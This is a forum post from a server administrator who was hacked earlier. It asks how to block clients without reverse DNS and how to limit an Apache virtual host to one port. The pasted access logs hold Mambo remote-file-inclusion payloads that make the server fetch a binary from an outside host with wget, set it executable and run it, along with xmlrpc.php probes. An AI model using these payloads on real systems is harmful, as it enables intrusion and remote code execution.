I recently had to rebuild a box after being hacked. I believe the exploit was run through phpAdsNew which has since been updated. I've made it a little more difficult to find this time BUT I noticed the server was SLOW to respond tonight. So I'm looking through log files. I am seeing the search for phpAdsNew files again...as well as others. This searching slowed the server down before.
How can I block access to this IP virtual host account from IPs that do not have a reverse dns lookup results, like the ISPs do for emails sent from boxes not resolving?
Since this is my ad server, and very few people need to access it by domain, can I set which port is allowed to listen for this domain in my site apache conf file? So then I can access it with the port# I assign in the URL?
Code:
mybox:~ # nslookup 211.144.142.150
Server: 216.127.136.200
Address: 216.127.136.200#53
** server can't find 150.142.144.211.in-addr.arpa: NXDOMAIN
mybox:~ # grep 211.144.142.150 /var/log/apache2/ads-access_log
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:17 -0400] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:19 -0400] "POST /xmlrpc.php HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:20 -0400] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:21 -0400] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:23 -0400] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:24 -0400] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:25 -0400] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:26 -0400] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:28 -0400] "POST /xmlrpc.php HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:29 -0400] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:34 -0400] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
mybox:~ # grep 211.144.142.150 /var/log/apache2/ads-error_log
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] script '/srv/www/vhosts/ads/html/index2.php' not found or unable to stat
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] script '/srv/www/vhosts/ads/html/index.php' not found or unable to stat
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/mambo
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/cvs
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/articles
[Mon Jul 17 10:01:17 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/cvs
[Mon Jul 17 10:01:19 2006] [error] [client 211.144.142.150] script '/srv/www/vhosts/ads/html/xmlrpc.php' not found or unable to stat
[Mon Jul 17 10:01:21 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/blog
[Mon Jul 17 10:01:22 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/blog
[Mon Jul 17 10:01:24 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/blogs
[Mon Jul 17 10:01:25 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/drupal
[Mon Jul 17 10:01:26 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/phpgroupware
[Mon Jul 17 10:01:27 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/wordpress
[Mon Jul 17 10:01:28 2006] [error] [client 211.144.142.150] script '/srv/www/vhosts/ads/html/xmlrpc.php' not found or unable to stat
[Mon Jul 17 10:01:30 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/xmlrpc
[Mon Jul 17 10:01:35 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/xmlsrv